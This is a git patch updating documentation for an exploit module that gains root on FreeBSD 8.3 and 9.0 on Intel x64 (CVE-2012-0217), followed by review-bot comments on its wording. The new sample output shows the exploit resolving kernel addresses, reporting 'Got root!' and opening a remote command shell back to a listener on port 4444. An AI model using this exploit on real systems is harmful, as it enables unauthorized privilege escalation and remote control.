From 1cf5c79cc83fee2326965fdd2e1a0bf66ddbec8e Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Fri, 14 Dec 2018 11:00:18 +0000 Subject: [PATCH] Update documentation --- .../freebsd/local/intel_sysret_priv_esc.md | 40 ++++++++++++++----- 1 file changed, 31 insertions(+), 9 deletions(-) diff --git a/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md b/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md index 1065b4da5f..d0086291b7 100644 --- a/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md +++ b/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md @@ -1,7 +1,7 @@ ## Description - This module exploits a vulnerability in the FreeBSD 9.0-RELEASE (x64) - kernel, when running on 64-bit Intel processors. + This module exploits a vulnerability in the FreeBSD kernel, + when running on 64-bit Intel processors. By design, 64-bit processors following the X86-64 specification will trigger a general protection fault (GPF) when executing a SYSRET @@ -15,7 +15,10 @@ ## Vulnerable Application - This module has been tested successfully on FreeBSD 9.0-RELEASE. + This module has been tested successfully on: + + * FreeBSD 8.3-RELEASE (amd64) + * FreeBSD 9.0-RELEASE (amd64) ## Verification Steps 
@@ -64,12 +67,31 @@ [*] Max line length is 131073 [*] Writing 218 bytes in 1 chunks of 614 bytes (octal-encoded), using printf [*] Launching exploit... - [*] [+] SYSRET FUCKUP!! - [*] [+] Start Engine... - [*] [+] Crotz... - [*] [+] Crotz... - [*] [+] Crotz... - [*] [+] Woohoo!!! + [*] CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com) + [*] + [*] [*] Retrieving host information... + [*] [+] CPU: GenuineIntel + [*] [+] sysname: FreeBSD + [*] [+] release: 9.0-RELEASE + [*] [+] version: FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC + [*] [+] machine: amd64 + [*] [*] Validating target OS and version... + [*] [+] Vulnerable :-) + [*] [*] Resolving kernel addresses... + [*] [+] Resolved Xofl to 0xffffffff80b02e70 + [*] [+] Resolved Xbnd to 0xffffffff80b02ea0 + [*] [+] Resolved Xill to 0xffffffff80b02ed0 + [*] [+] Resolved Xdna to 0xffffffff80b02f00 + [*] [+] Resolved Xpage to 0xffffffff80b03240 + [*] [+] Resolved Xfpu to 0xffffffff80b02fc0 + [*] [+] Resolved Xalign to 0xffffffff80b03080 + [*] [+] Resolved Xmchk to 0xffffffff80b02f60 + [*] [+] Resolved Xxmm to 0xffffffff80b02ff0 + [*] [*] Setup... + [*] [+] Trigger code... + [*] [+] Trampoline code... + [*] [*] Fire in the hole! + [*] [*] Got root! [+] Success! Executing payload... [*] Command shell session 2 opened (123.123.123.188:4444 -> 123.123.123.136:61024) at 2018-12-09 10:40:16 -0500 [+] Deleted /tmp/.mTaR4rAPd.c
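Review bot: In the first hunk, replacing "FreeBSD 9.0-RELEASE (x64)" with "the FreeBSD kernel" makes the Description unbounded; it no longer says which kernel versions are affected, and the CVE identifier (CVE-2012-0217, visible only in the exploit banner captured in the last hunk) appears nowhere in the Description. Suggest naming the advisory there, e.g. "This module exploits CVE-2012-0217 in the FreeBSD kernel, when running on 64-bit Intel processors.", so a reader can tell which fix level closes the bug without scrolling to the sample output.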
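Review bot: In the second hunk, the new "tested successfully on" list records only "(amd64)" for 8.3-RELEASE and 9.0-RELEASE, but the Description restricts the module to 64-bit Intel processors and the exploit output in the last hunk shows it validating "CPU: GenuineIntel" before firing. Suggest stating the CPU the tests ran on alongside the release, e.g. "FreeBSD 9.0-RELEASE (amd64) on an Intel CPU", so the tested matrix matches the vendor check the exploit actually performs.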
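Review bot: In the third hunk, the replacement output ends with "[*] [*] Got root!", the session opening and the temp-file cleanup, but no post-exploitation confirmation such as `id` returning uid=0(root) is shown, so the verification transcript never demonstrates from the session side that privilege escalation succeeded rather than taking the exploit's own banner at its word. Suggest appending the `id` output from the new session. Also, the banner line "CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)" is the only place the original exploit author is credited; that attribution belongs in the document's own references rather than solely inside captured output.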